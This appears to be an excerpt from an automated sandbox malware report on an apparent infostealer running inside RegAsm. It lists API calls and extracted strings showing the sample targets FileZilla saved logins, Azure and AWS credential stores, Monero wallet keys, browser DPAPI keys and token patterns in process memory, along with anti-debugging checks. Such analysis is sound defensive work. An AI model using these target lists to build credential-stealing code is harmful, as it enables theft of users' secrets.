            • Opcode Fuzzy Hash: 9cad883e92767d667f7a3bd3c491df47bdb8f8355287bf46401cfbf98ae607a3
            • Instruction Fuzzy Hash: BC0181B1A08608EBC710CF99DD45BEEBBB8FB04721F20021AF905E3690D7785945CBA5
            APIs
            • VirtualAllocExNuma.KERNEL32(00000000,?,?,004164BC), ref: 00401132
            Memory Dump Source
            • Source File: 00000003.00000002.1706437734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: AllocNumaVirtual
            • String ID:
            • API String ID: 4233825816-0
            • Opcode ID: 678cf5f3e7197d72abcfc3c147a4750855ebb5e345b53b76b616ef84aefebb1b
            • Instruction ID: 0e2e6d3d2f445679f77a7861b9af8e0e8f55b174cdb9f0aa425208459b8dc1b3
            • Opcode Fuzzy Hash: 678cf5f3e7197d72abcfc3c147a4750855ebb5e345b53b76b616ef84aefebb1b
            • Instruction Fuzzy Hash: 3DE08670945308FBE7205FA09C0AB4D76689B04B05F105056F708BA1E0C6B82501865C
            APIs
            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,004164BC), ref: 004010B3
            Memory Dump Source
            • Source File: 00000003.00000002.1706437734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: AllocVirtual
            • String ID:
            • API String ID: 4275171209-0
            • Opcode ID: f9d4902d87d53e064eb978b4b4efccb4618282ab89b9805507bbfbdb43c54504
            • Instruction ID: f48f966fb8dbc32d8d9482a6eca9c47ea769ab036d71d5fa6551aa32425d7b68
            • Opcode Fuzzy Hash: f9d4902d87d53e064eb978b4b4efccb4618282ab89b9805507bbfbdb43c54504
            • Instruction Fuzzy Hash: 62F02771641218BBE7149BA4AD49FAFB7DCE705B08F304459F940E3390D5719F00DA64
            APIs
            • IsDebuggerPresent.KERNEL32 ref: 0041B562
            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041B577
            • UnhandledExceptionFilter.KERNEL32(0041F298), ref: 0041B582
            • GetCurrentProcess.KERNEL32(C0000409), ref: 0041B59E
            • TerminateProcess.KERNEL32(00000000), ref: 0041B5A5
            Memory Dump Source
            • Source File: 00000003.00000002.1706437734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
            • String ID:
            • API String ID: 2579439406-0
            • Opcode ID: f83f28cb76d01a588ba20aedf737648f300cf2348463cefc92e4954df8d9d801
            • Instruction ID: e298f46f0b3396334d2e2e37c4a67069ca1d3d313a6b9180192500d6cd60c5fb
            • Opcode Fuzzy Hash: f83f28cb76d01a588ba20aedf737648f300cf2348463cefc92e4954df8d9d801
            • Instruction Fuzzy Hash: 2F21D678600214DFD720EF59F9D4AA97BB5FB08314F90803AE809D7261E7B46586CF9D
            APIs
            • SetUnhandledExceptionFilter.KERNEL32(Function_0001C897), ref: 0041C8DE
            Memory Dump Source
            • Source File: 00000003.00000002.1706437734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: ExceptionFilterUnhandled
            • String ID:
            • API String ID: 3192549508-0
            • Opcode ID: 92af57a2eb04ab3802c4d219b965fa46d3e89a576cd6fa8fbae2cab6dd9d340f
            • Instruction ID: 8e4dbfb736b9908720f30fe25f95c1a3b6087da1e007f902b0e4d68da9f23204
            • Opcode Fuzzy Hash: 92af57a2eb04ab3802c4d219b965fa46d3e89a576cd6fa8fbae2cab6dd9d340f
            • Instruction Fuzzy Hash: 8D9002B829111456561037719D896896D905ACC6137554861B405C4055EA9841849529
            Memory Dump Source
            • Source File: 00000003.00000002.1706437734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
            • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
            • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
            • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
            APIs
            • strtok_s.MSVCRT ref: 0041015B
            • memset.MSVCRT ref: 0041051D
              • Part of subcall function 00418380: malloc.MSVCRT ref: 00418388
              • Part of subcall function 00418380: strncpy.MSVCRT ref: 004183A3
            • strtok_s.MSVCRT ref: 004104B9
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1706437734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: strtok_s$mallocmemsetstrncpy
            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
            • API String ID: 2676359353-555421843
            • Opcode ID: d7e577ce13692004329fb370cb3b00ccbaeca2739e1146d2b69afdd9ee3d53ba
            • Instruction ID: f2c119995f801d95b771d97b8d40ebd85ad32e2919b54f786426441ea9706e1a
            • Opcode Fuzzy Hash: d7e577ce13692004329fb370cb3b00ccbaeca2739e1146d2b69afdd9ee3d53ba
            • Instruction Fuzzy Hash: BBD1A571A00108ABCB04EBF1DC4AEEE7739AF54314F50851EF103A7191DF78AA95CB69
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1706437734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: memset
            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$Z\A$\.IdentityService\$\.aws\$\.azure\$msal.cache
            • API String ID: 2221118986-156850865
            • Opcode ID: 9bcfa3529e603d52dd8ad33e36109966c27d26eb48124b6c4715542f7bf6ad63
            • Instruction ID: 646ecaa1659512b06866923d8f1ff883aab6ee332b32f164b7e7d78f354b44b8
            • Opcode Fuzzy Hash: 9bcfa3529e603d52dd8ad33e36109966c27d26eb48124b6c4715542f7bf6ad63
            • Instruction Fuzzy Hash: C741FC75A4021867CB20F760EC4BFDD773C5B54704F404459B64AA60D2EEFC57C98BAA
            APIs
              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
              • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
            • memcpy.MSVCRT(?,00000000,00000000), ref: 00405F16
            • memcpy.MSVCRT(?), ref: 00405F4E
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1706437734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: ??2@$memcpy$CrackInternet
            • String ID: "$"$------$------$------$XA$XA
            • API String ID: 4271525049-2501203334
            • Opcode ID: e5b182b8087e0edd649b211e19a2904699373939d329d9db10a108da200391d1
            • Instruction ID: fd4032899b6f210ca5ed4ade58f42d7f74ab7cfcec1a01a64090ede90c3e384c
            • Opcode Fuzzy Hash: e5b182b8087e0edd649b211e19a2904699373939d329d9db10a108da200391d1
            • Instruction Fuzzy Hash: 4C123F71921118ABCB14EBA1DC95FEEB338BF14314F40419EF50662191EF782B99CF69
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1706437734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*$18A
            • API String ID: 0-3461493422
            • Opcode ID: 726007c070200b8b6ccd5e432aca5a88abac811a359fd20cf8ca828f6c5e6349
            • Instruction ID: eff374fbcd62c6e18ab1f1aaab25817c9043c0eeef42efb3c17498ac9b2729e3
            • Opcode Fuzzy Hash: 726007c070200b8b6ccd5e432aca5a88abac811a359fd20cf8ca828f6c5e6349
            • Instruction Fuzzy Hash: 93A18FB1A00218ABCB34DFA4DC85FEE7379BF48305F448589E50D96181EB789B89CF65
            APIs
            • strlen.MSVCRT ref: 004169BF
            • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00416C3A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 004169ED
              • Part of subcall function 00416670: strlen.MSVCRT ref: 00416681
              • Part of subcall function 00416670: strlen.MSVCRT ref: 004166A5
            • VirtualQueryEx.KERNEL32(00416DAD,00000000,?,0000001C), ref: 00416A32
            • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00416C3A), ref: 00416B53
              • Part of subcall function 00416880: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416898
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1706437734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: strlen$MemoryProcessQueryReadVirtual
            • String ID: :lA$@
            • API String ID: 2950663791-2855229504
            • Opcode ID: 4afa45cea5b3bcaab92a32f2428c4a97edc849bca8639b017ecb6fd58acf4104
            • Instruction ID: 51c9d4b078fe92f83ab81220ebbaf7cdf2a8f9ee762561721c09ea6573e6fdbd
            • Opcode Fuzzy Hash: 4afa45cea5b3bcaab92a32f2428c4a97edc849bca8639b017ecb6fd58acf4104
            • Instruction Fuzzy Hash: 845108B5E04119ABDB04CF94D981AEFB7B5FF88304F108519F915A7240D738EA51CBA9
            APIs
            • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 00416B7E
            • OpenProcess.KERNEL32(001FFFFF,00000000,00416DAD,004205AD), ref: 00416BBC
            • memset.MSVCRT ref: 00416C0A
            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00416D5E
            Strings
            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00416C2C
            Memory Dump Source
            • Source File: 00000003.00000002.1706437734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: OpenProcessmemset
            • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
            • API String ID: 1606381396-4138519520
            • Opcode ID: 985516fdb4aba9a37da67002539eb8a614f9f3b36bd237ff0cc46e5de52e8429
            • Instruction ID: 7f38ab3eb3b1a919a3e5ec0c0fab515e305e32cb9f2de8b47bf31e49bfe0b2e9
            • Opcode Fuzzy Hash: 985516fdb4aba9a37da67002539eb8a614f9f3b36bd237ff0cc46e5de52e8429
            • Instruction Fuzzy Hash: 285162B0D002189BDB24EB95DC45BEEB774AF44318F5041AEE50566281EB78AEC8CF5D
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1706437734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: memset
            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
            • API String ID: 2221118986-218353709
            • Opcode ID: 917d05209e3c6e9ca6065a0a923e579d9e5d238dbdb3523c9004ab1032494658
            • Instruction ID: b5eb1e2d9a8a1e3cf56e2c34e54d9e93e9a372b4459d7a8870c797c8d4c08f80
            • Opcode Fuzzy Hash: 917d05209e3c6e9ca6065a0a923e579d9e5d238dbdb3523c9004ab1032494658
            • Instruction Fuzzy Hash: AB5184B1D501186BCB14EB61DC96FED733CAF50314F4041ADB60A62092EE785BD9CBAA
            APIs
              • Part of subcall function 004062D0: InternetOpenA.WININET(00420DE6,00000001,00000000,00000000,00000000,00420DE3), ref: 00406331
              • Part of subcall function 004062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
              • Part of subcall function 004062D0: HttpOpenRequestA.WININET(00000000,GET,?,?,00000000,00000000,00400100,00000000), ref: 004063D5
              • Part of subcall function 004062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
            • strtok.MSVCRT(00000000,?), ref: 00414E7E
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1706437734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: HttpInternetOpenRequest$ConnectSendstrtok
            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
            • API String ID: 1208788097-1526165396
            • Opcode ID: 403038929566516ced08024de874d387cf2f9a99d356b9ee5bed260c26f508a9
            • Instruction ID: 8f24e6183c5aafacdfff780c7fa5c74c912095ee1ff337cf81358bf1c292c6a0
            • Opcode Fuzzy Hash: 403038929566516ced08024de874d387cf2f9a99d356b9ee5bed260c26f508a9
            • Instruction Fuzzy Hash: D5516130911108ABCB14FF61CC9AEED7738AF50358F50401EF80B665A2DF786B95CB6A
            APIs
            • __lock.LIBCMT ref: 0041AD5A
              • Part of subcall function 0041A97C: __mtinitlocknum.LIBCMT ref: 0041A992
              • Part of subcall function 0041A97C: __amsg_exit.LIBCMT ref: 0041A99E
              • Part of subcall function 0041A97C: EnterCriticalSection.KERNEL32(?,?,?,0041A630,0000000E,0042A088,0000000C,0041A5FA), ref: 0041A9A6
            • DecodePointer.KERNEL32(0042A0C8,00000020,0041AE9D,?,00000001,00000000,?,0041AEBF,000000FF,?,0041A9A3,00000011,?,?,0041A630,0000000E), ref: 0041AD96
            • DecodePointer.KERNEL32(?,0041AEBF,000000FF,?,0041A9A3,00000011,?,?,0041A630,0000000E,0042A088,0000000C,0041A5FA), ref: 0041ADA7
              • Part of subcall function 0041B7F5: EncodePointer.KERNEL32(00000000,0041BA52,0042BDB8,00000314,00000000,?,?,?,?,?,0041B0C8,0042BDB8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041B7F7
            • DecodePointer.KERNEL32(-00000004,?,0041AEBF,000000FF,?,0041A9A3,00000011,?,?,0041A630,0000000E,0042A088,0000000C,0041A5FA), ref: 0041ADCD
            • DecodePointer.KERNEL32(?,0041AEBF,000000FF,?,0041A9A3,00000011,?,?,0041A630,0000000E,0042A088,0000000C,0041A5FA), ref: 0041ADE0
            • DecodePointer.KERNEL32(?,0041AEBF,000000FF,?,0041A9A3,00000011,?,?,0041A630,0000000E,0042A088,0000000C,0041A5FA), ref: 0041ADEA
            Memory Dump Source
            • Source File: 00000003.00000002.1706437734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
            • String ID:
            • API String ID: 2005412495-0
            • Opcode ID: 9dbc0315d39e44e03e69b1948a2dcd69f9a60bb4760d8e37f8bab661b8eb1333
            • Instruction ID: 26cd67dfac1a625c080c990f5aa3a4e8d575379cc8cf2dcf3c78269be391da57
            • Opcode Fuzzy Hash: 9dbc0315d39e44e03e69b1948a2dcd69f9a60bb4760d8e37f8bab661b8eb1333
            • Instruction Fuzzy Hash: CB3129B09423498FDF109FA9D9452DEBBF1BF48314F14402BD410A6251DBBC48A5CF6E
            APIs
            • __getptd.LIBCMT ref: 0041C3D9
              • Part of subcall function 0041B95F: __getptd_noexit.LIBCMT ref: 0041B962
              • Part of subcall function 0041B95F: __amsg_exit.LIBCMT ref: 0041B96F
            • __amsg_exit.LIBCMT ref: 0041C3F9
            • __lock.LIBCMT ref: 0041C409
            • InterlockedDecrement.KERNEL32(?), ref: 0041C426
            • free.MSVCRT ref: 0041C439
            • InterlockedIncrement.KERNEL32(0042B558), ref: 0041C451
            Memory Dump Source
            • Source File: 00000003.00000002.1706437734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
            • String ID:
            • API String ID: 634100517-0
            • Opcode ID: 68cb7e6ea9f2ec8c328fe504e648b6640a528a258a727550de86b644f98f4ab2
            • Instruction ID: 347e950a9de730bb6983817e76a39e35d30df20f4a69820d490e6e24dcd4e02e
            • Opcode Fuzzy Hash: 68cb7e6ea9f2ec8c328fe504e648b6640a528a258a727550de86b644f98f4ab2
            • Instruction Fuzzy Hash: 7D010431A826219BD720AB669C857EEB760BB04714F41811BE94463391CB3C68D2CFDE
            APIs
            • __getptd.LIBCMT ref: 0041C13D
              • Part of subcall function 0041B95F: __getptd_noexit.LIBCMT ref: 0041B962
              • Part of subcall function 0041B95F: __amsg_exit.LIBCMT ref: 0041B96F
            • __getptd.LIBCMT ref: 0041C154
            • __amsg_exit.LIBCMT ref: 0041C162
            • __lock.LIBCMT ref: 0041C172
            • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C186
            Memory Dump Source
            • Source File: 00000003.00000002.1706437734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
            • String ID:
            • API String ID: 938513278-0
            • Opcode ID: c97b1cd8c1bf5e7720fb8207f6683a26967bfbf4c7aefb49925ecc618f12c84f
            • Instruction ID: 8423f9a113a1835f1d35103eff65ed0838148ed172a20d49ff88b4dc443596f5
            • Opcode Fuzzy Hash: c97b1cd8c1bf5e7720fb8207f6683a26967bfbf4c7aefb49925ecc618f12c84f
            • Instruction Fuzzy Hash: 9EF06271AD5310ABD720BBA95C427DA3790AF00728F15410FE454A62D3CB6C58D19A9E
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1706437734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: __aulldiv
            • String ID: %d MB$@
            • API String ID: 3732870572-3474575989
            • Opcode ID: a22fd26a20c89c12fe6cfaaf614cf5a2958407047c3d7a896a6bd652d51aa950
            • Instruction ID: f6ead53c39b4582a22ff827f4f83d0c2aee1884270de42e44796eba59a74ffdb
            • Opcode Fuzzy Hash: a22fd26a20c89c12fe6cfaaf614cf5a2958407047c3d7a896a6bd652d51aa950
            • Instruction Fuzzy Hash: AD218CF1E44218ABDB10DFD8CC49FAEB7B9FB08B14F104509F605BB280D77869018BA9
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1706437734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: memcmpmemset
            • String ID: @$v10
            • API String ID: 1065087418-24753345
            • Opcode ID: 8900047ccc3a7ea6eca2ef2dfc1eae2581b6e08053fcaf9ffe0f5684236083b7
            • Instruction ID: 07f8737455eafbd8f61b9e4d9b284130f9ce7af93f488edb76ba3c8551e2a7c8
            • Opcode Fuzzy Hash: 8900047ccc3a7ea6eca2ef2dfc1eae2581b6e08053fcaf9ffe0f5684236083b7
            • Instruction Fuzzy Hash: 23414870A0020CEBCB04DFA4CC99BEE77B5BF44304F108029F905AB295DBB8AD45CB99
            APIs
            • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409DE2
              • Part of subcall function 00409BB0: memcpy.MSVCRT(?,?,?), ref: 00409C16
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1706437734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: memcmpmemcpy
            • String ID: $"encrypted_key":"$DPAPI
            • API String ID: 1784268899-738592651
            • Opcode ID: 740c6884d9f561bb7ce577100f1b7d1c7d71afeb4ed27ad6aba31cad7ccdc5b7
            • Instruction ID: 7f392d33d6ad21de2d61bb21213a98381b23072c845d074b64d64ac31095145a
            • Opcode Fuzzy Hash: 740c6884d9f561bb7ce577100f1b7d1c7d71afeb4ed27ad6aba31cad7ccdc5b7
            • Instruction Fuzzy Hash: 7A3150B5D00108ABCB04DBE4DC45AEF77B8AF48304F44856AE915B3282E7789E44CBA5
            APIs
            • memset.MSVCRT ref: 00407354
            • task.LIBCPMTD ref: 00407595
              • Part of subcall function 00409290: vsprintf_s.MSVCRT ref: 004092AB
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1706437734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: memsettaskvsprintf_s
            • String ID: Password
            • API String ID: 2675463923-3434357891
            • Opcode ID: e183b5279ab9e6df2eb167b03a4cc02d75207c5ff0d2bc4bafbb891a8174e7a2
            • Instruction ID: 975b1f2fff90f96d03099a1470760af69fc6b50b1064dc5ad3510b71ddc5061f
            • Opcode Fuzzy Hash: e183b5279ab9e6df2eb167b03a4cc02d75207c5ff0d2bc4bafbb891a8174e7a2
            • Instruction Fuzzy Hash: 52613DB5D041689BDB24DF50CC41BDAB7B8BF48304F0081EAE689A6181DFB46BC9CF95